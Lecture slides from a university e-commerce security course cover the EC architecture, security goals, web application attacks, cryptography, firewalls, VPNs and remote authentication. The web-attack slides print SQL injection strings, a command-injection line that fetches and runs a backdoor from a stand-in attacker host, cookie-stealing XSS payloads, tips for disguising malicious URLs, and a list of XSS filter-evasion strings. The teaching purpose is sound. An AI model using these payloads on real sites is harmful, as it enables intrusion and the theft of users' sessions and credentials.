ec architectural framework and ec security lecture 7 supakorn kungpisdan

EC Architectural Framework and EC Security

Lecture 7

Supakorn Kungpisdan

ITEC5611

S. Kungpisdan2

Outline

• EC Architectural Framework• EC Security

– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics

ITEC5611

S. Kungpisdan3

Secure Payment ProtocolsOnline Payment Infrastructure

Security and Encryption Technology

Network Protocol StandardsNetwork Infrastructure (Internet)

Business Service InfrastructureDirectories, Search Engines etc

Netw

orked

Mu

ltimed

ia conten

t p

ub

lishin

g techn

ologies( HT

ML

,XM

L,

JAV

A,G

raph

ics, Vid

eo tools etc.)Info

rmat

ion

Dis

trib

uti

on &

Mes

sagi

ng

Tec

hn

olog

ies

( H

TT

P,S

MT

P, e

tc.)

Legal and Public Policy FrameworkPublic key, Identification and Authentication Infrastructure

E-commerce ApplicationsCatalog based retail, Marketing & Advert.,

Banking& Investments, Supply Chain Management, Auctions, Home shopping,

procurements

E-commerce ApplicationsCatalog based retail, Marketing & Advert.,

Banking& Investments, Supply Chain Management, Auctions, Home shopping,

procurements

EC Framework

ITEC5611

S. Kungpisdan4

Network Infrastructure

• The Internet Superhighway is responsible for seamless, reliable transportation on Information among host devices.

• Local Area Networks, IEEE 802.3 Standards and Ethernet

• Wide Area Networks• The Seamless Interface is offered through

– Internet and TCP/IP Model– IP Addressing and Domain Naming System– Internet Industry Structure

ITEC5611

S. Kungpisdan5

Information Distribution Technologies

• Standard Protocols for Information Distribution on Internet– File Transfer Protocol (FTP)– Simple Mail Transfer Protocol (SMTP) – Hyper Text Transfer Protocol (HTTP)– Web Server Implementations

• Apache Web Server• Microsoft’s IIS

ITEC5611

S. Kungpisdan6

Multimedia Publishing Technologies

• Information Publishing and Web Browsers– Hyper Text Markup Language (HTML)– Forms and Common Gateway Interface – Active Server Pages (ASP) – Dynamic HTML– HTML Editors– XML

• Multimedia Content – Graphics and Image Formats– Web Image Formats– Other Multimedia objects

• VRML (Virtual Reality Markup Language)

ITEC5611

S. Kungpisdan7

Security and Encryption

• Importance of security for Electronic Commerce and Inherent vulnerability of Internet

• Protecting the Web (HTTP) Service• The Issues in Transaction Security

– Cryptography and Cryptanalysis– Symmetric key cryptographic Algorithms– Public-key Algorithms– Authentication protocols– Integrity and Non-repudiation

• Digital Certificates and Signatures• Electronic Mail Security

– PGP, S/MIME• Security protocols for E-commerce

– SSL, TLS

ITEC5611

S. Kungpisdan8

Payment Services

• Payment Systems• Characteristics of Online Payment Systems

– Pre-Paid Electronic Payment Systems– Instant-paid Electronic Payment Systems– Post-Paid Electronic Payment Systems

• Some Electronic Payment Systems – Secure Electronic Transaction (SET) for Credit Cards– E-cash– NetCheque

ITEC5611

S. Kungpisdan9

Business Service Infrastructure

• Searching and Locating Information on Web Space• Information Directories• Search Engines• Improving the search results • Internet Advertising

ITEC5611

S. Kungpisdan10

Public Policy and Legal Infrastructure

• Universal Access to Network Infrastructure• Model Law for Electronic Commerce• Taxation Issues in Electronic Commerce• Need for Public Key Infrastructure (PKI)• Digital Certificates and Digital Signatures

ITEC5611

S. Kungpisdan11

Outline



ITEC5611

S. Kungpisdan12

Basic Security Issues

• From the user’s perspective:– Is Web server owned and operated by a legitimate

company?– Does Web page and form contain any malicious or

dangerous code or content?– Will the owner of the Web site will not distribute the

information the user provides to some other party?

ITEC5611

S. Kungpisdan13

Basic Security Issues (cont.)

• From the company’s perspective:– How does the company know the user will not

attempt to break into the Web server or alter the pages and content at the site?

– How does the company know that the user will not try to disrupt the server so that it is not available to others?

ITEC5611

S. Kungpisdan14

Basic Security Issues (cont.)

• From both parties’ perspectives:– How do both parties know that the network

connection is free from eavesdropping by a third party “listening” on the line?

– How do they know that the information sent back-and-forth between the server and the user’s browser has not been altered?

S. Kungpisdan15

Goals of Computer Security (CIA)

• Confidentiality– Ensure that the message is accessible only by authorized

parties

• Integrity– Ensure that the message is not altered during the

transmission

• Availability– Ensure that the information on the system is available for

authorized parties at appropriate times

ITEC5611

ITEC5611

S. Kungpisdan16

Basic Security Issues

• Authentication• Authorization• Auditing• Confidentiality (Privacy)• Integrity• Availability• Non-repudiation

S. Kungpisdan17

Security Trends

ITEC5611

S. Kungpisdan18

Vulnerabilities, Threats, and Attacks

• Vulnerability– A weakness in the security system

– E.g. a program flaw, poor security configuration, bad password policy

• Threat– A set of circumstances or people that potentially causes

loss or harm to a system

• Attack– An action or series of actions to harm a system

ITEC5611

S. Kungpisdan19

Relationships among different Security Components

ITEC5611

S. Kungpisdan20

Relationship of Threats and Vulnerabilities

ITEC5611

S. Kungpisdan21

How Hackers Exploit Weaknesses

ITEC5611

ITEC5611

S. Kungpisdan22

General Security Issues at EC Sites

ITEC5611

S. Kungpisdan23

Outline



S. Kungpisdan24

Types of Security Incidences

ITEC5611

S. Kungpisdan25

Hackers

• White Hat Hackers

• Grey Hat Hackers

• Script Kiddies

• Hacktivists

• Crackers or Black Hat Hackers

ITEC5611

S. Kungpisdan26

Hackers’ Steps

1. Gather information Telephone conversation, password crackers

2. Gain initial system access Often limited access and rights

3. Increase privileges and expand access Try to get root privilege

4. Carry out purpose of the attack Steal or destroy information

5. Install backdoors Build entrance for the next visit

6. Cover tracks and exit Remove all traces. Usually modifying log files

ITEC5611

S. Kungpisdan27

Malicious Codes

• Viruses– A destructive program code that attaches itself to a host

and copies itself and spreads to other hosts– Viruses replicates and remains undetected until being

activated.

• Worms– Unlike viruses, worms is independent of other programs or

files. No trigger is needed.

• Trojans– Externally harmless program but contains malicious code

• Spyware– Software installed on a target machine sending information

back to an owning server

ITEC5611

ITEC5611

S. Kungpisdan28

Security Incidences• Probe

– A probe is characterized by unusual attempts to gain access to a system or to discover information about the system.

– Sometimes followed by a more serious security event, but they are often the result of curiosity or confusion.

• Scan – A large number of probes done using an automated tool. – Often a prelude to a more directed attack on systems whose security

can be breached.• Account Compromise

– Unauthorized use of a computer account by someone other than the account owner, without involving system-level or root-level privileges. It might expose the victim to serious data loss, data theft, or theft of services.

– The lack of root-level access means that the damage can usually be contained, but a user-level account opens up avenues for greater access to the system.

ITEC5611

S. Kungpisdan29

Security Incidences (cont’d)

• Root Compromise – Similar to an account compromise, except that the

account that has been compromised has special privileges on the system.

• Packet Sniffer – A program that captures data from information packets

as they travel over the network.

ITEC5611

S. Kungpisdan30

Security Incidences (cont’d)

denial-of-service (DoS) attackAn attack on a Web site in which an attacker uses specialized software to send a flood of data packets to the target computer with the aim of overloading its resources

distributed denial-of-service (DDoS) attackA denial-of-service attack in which the attacker gains illegal administrative access to as many computers on the Internet as possible and uses the multiple computers to send a flood of data packets to the target computer

ITEC5611

S. Kungpisdan31

Using Zombies in a Distributed DoS Attack

ITEC5611

S. Kungpisdan32

Outline



Attacking Web Applications

• The majority of vulnerabilities are caused by a lack of proper input validation by the application before processing user-supplied data

• This can allow attackers to disclose information about the site, steal information from backend DBs, or execute binary code on the web server

S. Kungpisdan33ITEC5611

SQL Injection

• Many web applications rely on backend DBs for information storage and retrieval.

• Sometimes a script will perform a DB query using input supplied from a web page, without verifying that the input does not contain any escape characters

• Consider the following:• Query = “SELECT * FROM users WHERE username =

‘{$_POST[‘user’]}’ AND password = ‘{$_POST[‘pass’]}’ ”;

• “SELECT * FROM users WHERE username = ‘bob’ AND password = ‘ ’ OR 1=1 ”;


Code Injection

• Sometimes user-supplied strings are not properly checked for escape characters before being passed to commands as arguments

• Consider a PHP script that takes a string supplied from web page form and passes it to the nslookup utility


Code Injection (cont.)

• If supply ;ls –la/, the script will execute the command nslookup;ls –la/, resulting in a listing of the root directory being printed out


Code Injection (cont.)

• wget and perl commands could be used to download and run a backdoor on the web server by supplying the following line to the script

• ;wget http://attackersite/backdoor.pl;perl backdoor.pl


Cross-Site Scripting (XSS)

• XSS vulnerabilities allow attackers to inject code or HTML into a web page that will be executed when a different user visits that page

• These attacks target visitors to a web site, not the site itself, and occur when a web page does not properly sanitize user input before using it in output

• As a matter of fact in vulnerable websites is possible to execute HTML and JavaScript codes from a not sanitized form, which combined can be really dangerous: it's possible to steal cookies or to redirect web pages to build fake login in order to steal login usernames and passwords.


Types of XSS

• The term XSS is actually a bit elusive because it includes different kinds of attacks that stands each other on different attacking mechanisms.

• There are actually three types of Cross-Site Scripting, commonly named as: – DOM-Based XSS – Non-persistent XSS – Persistent XSS

S. Kungpisdan39

Ref: http://www.milw0rm.com/papers/146http://en.wikipedia.org/wiki/Cross_Site_Scripting

ITEC5611

http://www.milw0rm.com/papers/146

http://en.wikipedia.org/wiki/Cross_Site_Scripting

DOM-based XSS

• DOM-based or Type 0 XSS vulnerability, also referred to as local XSS, is based on the standard object model for representing HTML or XML called the Document Object Model or DOM for short.

• The DOM-Based XSS allows to an attacker to work not on a victim website but on a victim local machine


DOM-based XSS (cont.)

1. The attacker creates a well-built malicious website

2. The ingenuous user opens that site

3. The user has a vulnerable page on his machine

4. The attacker's website sends commands to the vulnerable HTML page

5. The vulnerable local page execute that commands with the user's privileges on that machine

6. The attacker easily gain control on the victim computer.


Exploit Scenario

1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.

2. Alice clicks on the link.

3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer.

4. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone.

5. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer.


DOM-based XSS (cont.)

• DOM-based XSS is really dangerous because it operates on the victim system strictly and as long as the user doesn't look after his/her security issues and doesn't apply updates, the DOM-Based XSS will work fine.

• Solution: To prevent this kind of attacks there are only two things to take care of:– Do not visit untrusted website – Keep your system up to date


Non-persistent XSS

• The non-persistent or Type 1 XSS is also referred to as a reflected vulnerability, and is by far the most common type.

• It's commonly named as "non-persistent" because it works on an immediate HTTP response from the victim website

• It shows up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user.

• If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page


Non-persistent XSS: Search Engine

• Attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.

• If this happens at 99% the Search engine will execute also JavaScript arbitrary code.


Example

1. Assure that a website works like this: http://www.example.com/search.php?text=TEXTTOSEARCH

2. Try to include some HTML tags in the "text" variable: http://www.example.com/search.php?text=<img src="http://attacker.com/image.jpg">

If the website is vulnerable it will display the attacker's image into the result webpage.


Example (cont.)

3. Try then to write some JavaScript code: http:///www.example.com/search.php?text=<script>alert(document.cookie)</script>

Probably the website will return an alert popup with the current Cookie for the site itself.


Example (cont.)

• This vulnerability can be used by the attacker to steal information to users of the victim website providing them for example an email with an URL like: http://www.victim.com/search.php?text=MALICIOUSCODE

• To make that URL less suspicious it will be useful to encode the code in URL Hex valueFor example the code: <script>alert("XSS")</script> Encoded will look like: %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C %2F%73%63%72%69%70%74%3E


Example (cont.)

• And as comes the malicious url will turn from:

http://www.victim.com/search.php?text=<script>alert("XSS")</script>

Into: http://www.victim.com/search.php?text=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22 %58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E

Which, for a clueless user, it's lot less suspicious than the first one.


Example (cont.)

1. The attacker realizes that the victim website is vulnerable to XSS

2. The attacker creates on his website an ad-hoc page which is used to steal sensible information, e.g. Cookies, or to make a fake login of the victim website.

3. The attacker provides to a user a crafted URL containing a malicious code like:

http://www.victim.com/search.php?text= <script>document.location("http://attackersite.com/fakelogin.php")</script>

Encoded in Hex.

4. The user visits the web page and is obscurely redirect the attacker's fakelogin

5. The user is invited to log into the system and he does.

6. The fake login steals the username and password of the victim.


Exploit Scenario

1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information.

2. Mallory observes that Bob's website contains a reflected XSS vulnerability.

3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, making it look as if it came from Bob (i.e., the email is spoofed).

4. Alice visits the URL provided by Mallory while logged into Bob's website.


Exploit Scenario (cont.)

5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server. The script can be used to email Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc) without Alice's knowledge.


Interesting Example

• http://www.yannarak.net/node/2


http://www.yannarak.net/node/2

Persistent XSS

• The persistent XSS is similar to non-persistent XSS – Both works on a victim site and tries to hack user information

• However, attacker doesn't need to provide the crafted URL to the users

• Because the website itself permits to users to insert fixed data into the system– This is the case for example of "guestbooks"

• Usually the users use that kind of tool to leave messages to the owner of the website

• An attacker can insert some malicious code in his message and let ALL visitors to be victim of that.


Exploit Scenario

1. Bob hosts a web site allowing users to post messages and other content to the site for later viewing by other members.

2. Mallory notices that Bob's website is vulnerable to a type 2 XSS attack.

3. Mallory posts a message, controversial in nature, which may encourage many other users of the site to view it.

4. Upon merely viewing the posted message, site users' session cookies or other credentials could be taken and sent to Mallory's web server without their knowledge.

5. Later, Mallory logs in as other site users and posts messages on their behalf....


Exploit Scenario (cont.)

• This works when the tool provided (the guestbook in the example) doesn't do any check on the content of the inserted message: it just inserts the data provided from the user into the result page.

• The attacker could easily insert as much code as he wants into the tool, for example:

<img src="javascript:document.location ('http://attacker.com/steal.php?cookie=' . encodeURI(document.cookie));">

This allows the attacker to steal the cookie of the victim user.


More about XSS

• In order to make the attack less suspicious it's possible to "obfuscate" the IP address of the attacker's website, encoding the IP address with three formats: – Dword Address

– Hex Address

– Octal Address

• For example the IP address 127.0.0.1 will look like: – Dword: 2130706433 – Hex: 0x7f.0x00.0x00.0x01 – Octal: 0177.0000.0000.0001

• Try for example: http://0x7f.0x00.0x00.0x01/ and it will open your localhost web server.


Possible XSS Cheats

• <IMG SRC="javascript:alert('XSS');"> • <IMG SRC=javascript:alert('XSS')> • <IMG

SRC="javascript :alert('PLAYH ACK.NET')">

• <IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"> • <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT> • <<SCRIPT>alert("XSS");//<</SCRIPT> • <iframe src=http://example.com/scriptlet.html < • <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> • <BODY BACKGROUND="javascript:alert('XSS')"> • <BODY ONLOAD=alert(document.cookie)> • <IMG DYNSRC="javascript:alert('XSS')">


Possible XSS Cheats (cont.)

• <IMG DYNSRC="javascript:alert('XSS')"> <BR SIZE="&{alert('XSS')}">

• <IMG SRC='vbscript:msgbox("XSS")'> • <TABLE BACKGROUND="javascript:alert('XSS')"> • <DIV STYLE="width: expression(alert('XSS'));"> • <DIV STYLE="background-image:

url(javascript:alert('XSS'))"> • <STYLE TYPE="text/javascript">alert('XSS');</STYLE> • <STYLE

type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

• <?='<SCRIPT>alert("XSS")</SCRIPT>'?> • <A

HREF="javascript:document.location='http://www.example.com/'">XSS</A>


Information Disclosure

• An error page can discloses the path of thee web server’s root directory

• The path disclosure can aid attackers performing reconnaissance on the site

• phpinfo.php, part of a default PHP install, is a script providing the OS and software version on the host and other related information

• Google for inurl:phpinfo.php to see exactly how much information is leaked


ITEC5611

S. Kungpisdan61

Outline



ITEC5611

S. Kungpisdan62

CIA for Access Control

• Confidentiality– Not disclosed to unauthorized person

• Integrity– Prevention of modification by unauthorized users– Prevention of unauthorized changes by otherwise authorized

users– Internal and External Consistency– Internal Consistency within the system (i.e. within a database

the sum of subtotals is equal to the sum of all units)– External Consistency – database with the real world (i.e.

database total is equal to the actual inventory in the warehouse)

• Availability– Timely access

ITEC5611

S. Kungpisdan63

Security Controls

Ref: . Harris, CISSP All-in-One Exam Guide, 3rd Edition, McGraw-Hill

ITEC5611

S. Kungpisdan64

Security Controls (cont.)

Ref: . Harris, CISSP All-in-One Exam Guide, 3rd Edition, McGraw-Hill

ITEC5611

S. Kungpisdan65

Authentication

• Something you know– Passwords, pins

• Something you have– Tokens, smart cards

• Something you are– biometrics

ITEC5611

S. Kungpisdan66

Biometrics

biometric systemsAuthentication systems that identify a person by measurement of a biological characteristic, such as fingerprints, iris (eye) patterns, facial features, or voice

physiological biometricsMeasurements derived directly from different parts of the body (e.g., fingerprint, iris, hand, facial characteristics)

behavioral biometricsMeasurements derived from various actions and indirectly from various body parts (e.g., voice scans or keystroke monitoring)

ITEC5611

S. Kungpisdan67

Biometrics (cont.)

• Fingerprints• Palm Scans• Hand Geometry• Retina Scans• Iris Scans• Facial Scans• Voice Print• Signature Dynamics• Keyboard Dynamics

ITEC5611

S. Kungpisdan68

Single Sign-on

• Kerberos• Allow a user to access many services from only

one authentication• Symmetric key encryption

– KDC – Kerberos-trusted Key Distribution Center– AS – Authentication Server– TGS – Ticket Granting Service

ITEC5611

S. Kungpisdan69

Kerberos (cont.)

Ref: W. Stallings, Cryptography and Network Security, 4 th Edition, Pearson-PrenticeHall

ITEC5611

S. Kungpisdan70

Intrusion Detection

• Network Based– Real Time, Passive– Snort

• Host Based – System and event logs– Limited by log capabilities

• Honey Pot• System Integrity Verifier (SIV)

– Tripwire

ITEC5611

S. Kungpisdan71

Intrusion Detection (cont.)

• Signature Based – (Knowledge Based)– Signatures of an attack are stored and referenced

– Failure to recognize slow attacks

– Must have signature stored to identify

• Statistical Anomaly Based (Behavior Based)– IDS determines “normal” usage profile using statistical samples

– Detects anomaly from the normal profile

ITEC5611

S. Kungpisdan72

Measures for compensating for both internal and external access violations

• Backups• RAID – Redundant Array of Inexpensive Disks• Fault Tolerance• Business Continuity Planning• Insurance

ITEC5611

S. Kungpisdan73

Outline



Transaction Security Issues

• Disclosure:– Release of message contents to any person not authorized to

see them • Traffic Analysis:

– It refers to the discovery of the pattern of traffic between parties.• Masquerade:

– It refers to insertion of messages into the network from a fraudulent source.

• Content modification: – Changes to the contents of a message, including insertion,

deletion, transposition, or modification.

ITEC5611

S. Kungpisdan74

Transaction Security Issues (cont.)

• Sequence modification: – It refers insertion, deletion, and reordering of some sequenced

packets by the intruder during transmission.• Timing modification:

– It refers to delayed or replay of old message sequences that were recorded by intruder in an earlier transaction.

• Repudiation: – It refers to the denial of receipt of message by destination or

denial of transmission of message by source.

ITEC5611

S. Kungpisdan75

ITEC5611

S. Kungpisdan76

Encryption

The process of scrambling (encrypting) a message (plaintext) into ciphertext in such a way that it is difficult, expensive, or time-consuming for an unauthorized person to unscramble (decrypt) it

plaintext + encryption algorithm + key ciphertext

ITEC5611

S. Kungpisdan77

Basic Terminology

• plaintext - original message • ciphertext - coded message • cipher - algorithm for transforming plaintext to ciphertext • key - info used in cipher known only to sender/receiver • encipher (encrypt) - converting plaintext to ciphertext • decipher (decrypt) - recovering ciphertext from plaintext• cryptography - study of encryption principles/methods• cryptanalysis (codebreaking) - study of principles/

methods of deciphering ciphertext without knowing key• cryptology - field of both cryptography and cryptanalysis

ITEC5611

S. Kungpisdan78

ITEC5611

S. Kungpisdan79

Cryptography and Steganography

• Plaintext can be hidden by two ways:– Steganography: conceal the existence of the

message– Cryptography: render the message unintelligible to

outsiders using various kinds of transformation of the text

• Examples of Steganography– Character marking: overwrite text with pencil– Invisible ink: use special substance– Pin punctures: pin puncture on selected letters

ITEC5611

S. Kungpisdan80

How a Cryptosystem Works

Plaintext (M) (data file or messages)

encryption algorithm (E) + secret key A (KA)

Ciphertext (C) (stored or transmitted safely)

decryption algorithm (D) + secret key B (KB)

Plaintext (M) (original data or messages)

Note: Key A may be the same as Key B, depending on the algorithm

E(M) = CD(C) = MD(E(M)) = M

ITEC5611

S. Kungpisdan81

Brute Force Search

• always possible to simply try every key • most basic attack, proportional to key size • assume either know / recognise plaintext

Key Size (bits) Number of Alternative Keys

Time required at 1 decryption/µs

Time required at 106 decryptions/µs

32 232 = 4.3 109 231 µs = 35.8 minutes 2.15 milliseconds

56 256 = 7.2 1016 255 µs = 1142 years 10.01 hours

128 2128 = 3.4 1038 2127 µs = 5.4 1024 years 5.4 1018 years

168 2168 = 3.7 1050 2167 µs = 5.9 1036 years 5.9 1030 years

26 characters (permutation)

26! = 4 1026 2 1026 µs = 6.4 1012 years 6.4 106 years

ITEC5611

S. Kungpisdan82

Caesar Cipher

• earliest known substitution cipher• by Julius Caesar • first attested use in military affairs• replaces each letter by 3rd letter on• example:

meet me after the toga partyPHHW PH DIWHU WKH WRJD SDUWB

ITEC5611

S. Kungpisdan83

K=3

Inner: ciphertextOuter: plaintext

Caesar Cipher

ITEC5611

S. Kungpisdan84

Cryptanalysis of Caesar Cipher

• only have 26 possible ciphers – A maps to A,B,..Z

• could simply try each in turn • a brute force search • given ciphertext, just try all shifts of letters• do need to recognize when have plaintext• eg. break ciphertext "GCUA VQ DTGCM"

ITEC5611

S. Kungpisdan85

Types of Cryptography

• Symmetric Cryptography– Deploy the same secret key to encrypt and decrypt

messages– The secret key is shared between two parties– Encryption algorithm is the same as decryption

algorithm

• Asymmetric (Public-key) Cryptography– Private key, Public key– The secret key is not shared and two parties can

still communicate using their public keys– Encryption alg. is different from decryption alg.

ITEC5611

S. Kungpisdan86

Symmetric Cryptography


ITEC5611

S. Kungpisdan87

Public-Key Cryptography


ITEC5611

S. Kungpisdan88

Data Encryption Standard (DES)

• Derived in 1972 as derivation of Lucifer algorithm developed by Horst Fiestel at IBM

• Commercial and non-classified systems• DES uses 64 bit block size and 56 bit key, begins with

64 bit key and strips 8 parity bits• DEA is 16 round cryptosystem designed for

implementation in hardware• 56 bit key = 256 or 70 quadrillion possible keys• Distributed systems can break it. U.S. Government no

longer uses it• Triple DES – three encryptions using DEA are now being

used until AES is adopted

ITEC5611

S. Kungpisdan89

3DES

• Double encryption is subject to meet in the middle attack

• Encrypt on one end decrypt on the other and compare the values

• So Triple DES is used• Can be done several different ways:

– DES – EDE2 (encrypt key 1, decrypt key 2, encrypt key 1)

– DES – EE2 (encrypt key 1, encrypt key 2, encrypt key 1)

– DES –EE3 (encrypt key 1, encrypt key 2, encrypt key 3) - most secure

ITEC5611

S. Kungpisdan90

AES

• Advanced Encryption Standard• Block Cipher that will replace DES• Anticipated that Triple DES will remain approved for

Government Use• AES announced by NIST in January 1997 to find

replacement for DES

• October 2, 2000 NIST Selected Rijndael• 2 Belgian Cryptographers Dr. Daeman and Dr. Rijmen• Will be used by government for sensitive but unclassified

documents

ITEC5611

S. Kungpisdan91

RSA

• Rivest, Shamir and Addleman• Based on difficulty of factoring a number which

is the product of two large prime numbers, may be 200 digits each.

• Can be used for Encryption, key exchange, and digital signatures

ITEC5611

S. Kungpisdan92

Elliptic Curve Cryptography (ECC)

• Elliptic curve discrete logarithm are hard to compute than general discrete logarithm

• Smaller key size same level of security• Elliptic curve key of 160 bits = RSA of 1024 bits• Suited to smart cards and wireless devices (less

memory and processing)• Digital signatures, encryption and key

management

ITEC5611

S. Kungpisdan93

Digital Signal Standard (DSS) and Secure Hash Standard (SHS)

• Enables use of RSA digital signature algorithm or DSA –Digital Signature Algorithm (based on El Gamal)

• Both use The Secure Hash Algorithm to compute message digest then processed by DSA to verify the signature. Message digest is used instead of the longer message because faster.

ITEC5611

S. Kungpisdan94

MD5 and SHA-1

• MD5 Message Digest version 5– Developed by Ronald Rivest in 1991– Produces 128 bit message digest

• SHA-1– Secure Hash Algorithm produces 160 bit digest if

message is less than 2^64 bits.– It is computationally infeasible to find message from

message digest– It is computationally infeasible to find to different

messages with same message digest – Padding bits are added to message to make it a

multiple of 512

ITEC5611

S. Kungpisdan95

Digital Signatures

ITEC5611

S. Kungpisdan96

Public Key Certification Systems

• A source could post a public key under the name of another individual

• Digital certificates counter this attack, a certificate can bind individuals to their key

• A Certificate Authority (CA) acts as a notary to bind the key to the person

• CA must be cross-certified by another CA

ITEC5611

S. Kungpisdan97

Public Key Infrastructure

• Digital Certificates• Certificate Authorities (CA)• Registrations Authorities• Policies and procedures• Certificate Revocation• Non-repudiation support• Timestamping• Lightweight Directory Access Protocol• Security Enabled Applications• Cross Certification

ITEC5611

S. Kungpisdan98

Key Escrow

• Allowing law enforcement to obtain the keys to view peoples encrypted data

• Escrow the key in two pieces with two trusted escrow agents

• Court order to get both pieces• Clipper Chip – implemented in tamper proof

hardware

ITEC5611

S. Kungpisdan99

Key Management

• Key control• Key recovery• Key storage• Key retirement/destruction• Key Change• Key Generation• Key theft• Frequency of key use

ITEC5611

S. Kungpisdan100

E-mail Security

• Non-repudiation

• Confidentiality of messages

• Authentication of Source

• Verification of delivery

ITEC5611

S. Kungpisdan101

Secure Multipurpose Internet Mail Extensions (S/MIME)

• Adds secure services to messages in MIME format

• Provides authentication through digital signatures

• Follows Public Key Cryptography Standards (PKCS)

• Uses X.509 Signatures

ITEC5611

S. Kungpisdan102

Pretty Good Privacy - PGP

• Phil Zimmerman• Symmetric Cipher using IDEA• RSA is used for signatures and key distribution• No CA, uses “web of trust”• Users can certify each other

ITEC5611

S. Kungpisdan103

Secure Sockets Layer (SSL)

• Developed by Netscape in 1994• Uses public key to authenticate server to the client• Also provides option client to sever authentication• Supports RSA public Key Algorithms, IDEA, DES, and

3DES• Supports MD5 Hashing• HTTPS header• Resides between the application and TCP layer• Can be used by telnet, FTP, HTTP and e-mail protocols.• Based on X.509• Transaction Layer Security Successor to SSL

ITEC5611

S. Kungpisdan104

Outline



ITEC5611

S. Kungpisdan105

OSI Security Services

• A security service is a collection of security mechanisms, files, and procedures that help protect the network.– Authentication– Access control– Data confidentiality– Data integrity– Non-repudiation– Logging and monitoring

ITEC5611

S. Kungpisdan106

OSI Security Mechanisms

• A security mechanism is a control that is implemented in order to provide the 6 basic security services.– Encipherment (encryption and decryption)– Digital signature– Access Control– Data Integrity– Authentication– Traffic Padding– Routing Control– Notarization

ITEC5611

S. Kungpisdan107

Application Layer Security

• SET – Secure Electronic Transaction– Originated by Visa and MasterCard– Being overtaken by SSL

• HTTPS - Secure HTTP– Early standard for encrypting HTTP messages– Also being overtaken by SSL

• S/MIME – Secure Multi-purposed Internet Mail Extension– Email encryption and digital signature

ITEC5611

S. Kungpisdan108

Transport Layer Security

• SSH-2 – Secure Shell version 2– SSH has RSA Certificates– Supports authentication, compression, confidentiality, and

integrity– DES Encryption– Because Secure Shell (SSH-2) supports authentication,

compression, confidentiality, and integrity, SSH is used frequently for Encrypted File Transfer

• SSL – Secure Socket Layer– Contains SSL record protocol and SSL Handshake Protocol– Uses symmetric encryption and public key for authentication– MAC – Message Authentication Code for Integrity

ITEC5611

S. Kungpisdan109

Firewalls

• Packet Filtering Firewall - First Generation– Screening Router– Operates at Network and Transport level– Examines Source and Destination IP Address– Can deny based on ACLs– Can specify Port

• Application Level Firewall - Second Generation– Proxy Server– Copies each packet from one network to the other– Masks the origin of the data– Operates at layer 7 (Application Layer)– Reduces Network performance since it has do analyze each

packet and decide what to do with it.– Also Called Application Layer Gateway

ITEC5611

S. Kungpisdan110

Firewalls (cont.)

• Stateful Inspection Firewalls – Third Generation– Packets Analyzed at all OSI layers– Queued at the network level– Faster than Application level Gateway

• Dynamic Packet Filtering Firewalls – Fourth Generation– Allows modification of security rules– Mostly used for UDP– Remembers all of the UDP packets that have crossed the

network’s perimeter, and it decides whether to enable packets to pass through the firewall.

• Kernel Proxy – Fifth Generation– Runs in NT Kernel– Uses dynamic and custom TCP/IP-based stacks to inspect the

network packets and to enforce security policies.

ITEC5611

S. Kungpisdan111

Demilitarized Zone (DMZ)

ITEC5611

S. Kungpisdan112

Virtual Private Networks

• PPTP – Point-to-Point Tunneling Protocol– Works at the Data Link Layer– Single point to point connection from client to server– Common with asynchronous connections with NT and Win 95

• L2TP - Layer 2 Tunneling Protocol– Combination of PPTP and earlier Layer 2 Forwarding Protocol (L2F)– Multiple protocols can be encapsulated within the L2TP– Single point to point connection from client to server– Common with Dial-up VPNs

• IPSec– Operates at the network layer– Allows multiple and simultaneous tunnels– Encrypt and authenticate IP data– Focuses more on Network to Network Connectivity

ITEC5611

S. Kungpisdan113

Wireless Security

• WEP – Wired Equivalency Privacy – up to 128-bit WEP

• WPA (Wireless Protected Access) is more secure, recently WPA2

• WAP - Wireless Access Point• SSID – Service Set Identifier – Network Name

– Disable SSID broadcast

• Use encryption, VPN, treat as external connection, directional antenna

ITEC5611

S. Kungpisdan114

Remote Node Security Protocols

• Password Authentication Protocol (PAP)– Remote security protocol. Provides Identification and

Authentication.– Uses static replayable password for authentication (now

considered weak)– Does not encrypt the User ID or Password

• Challenge Handshake Protocol (CHAP)– Next evolution of PAP uses stronger authentication– Nonreplayable Challenge/Response– Verifies Identity of the node– Often used to enable network-to-network communication– Commonly used by remote access servers and xDSL, ISDN,

and cable modems

ITEC5611

S. Kungpisdan115

Remote Access Authentication System

• TACACS – Terminal Access Controller Access Control System (TCP)

• TACACS+ – includes the use of two factor authentication

• RADIUS – Remote Access Dial-In User Service (UDP)

ITEC5611

S. Kungpisdan116

TACACS

• Terminal Access Controller Access Control System • Provides remote authentication and related services• User password administered in a central database rather

than in individual routers• TACACS enabled network device prompts for user name

and static password• TACACS enabled network device queries TACACA

server to verify password• Does not support prompting for password change or use

of dynamic tokens

ITEC5611

S. Kungpisdan117

TACACS+

• Terminal Access Controller Access Control System Plus

• Proprietary CISCO enhancement• Two factor Authentication• User can change password• Ability to use secure tokens• Better Audit Trails

ITEC5611

S. Kungpisdan118

RADIUS

• Remote Access Dial-In User Service • Offers similar benefits to TACACS+• Often used as a stepping stone to TACACS+• Radius Server contains dynamic password and network

service access information (Network ACLS)• Radius is a fully open protocol, can be customized for

almost any security system• Can be used with Kerberos and provides CHAP remote

node authentication• Except does not work with:

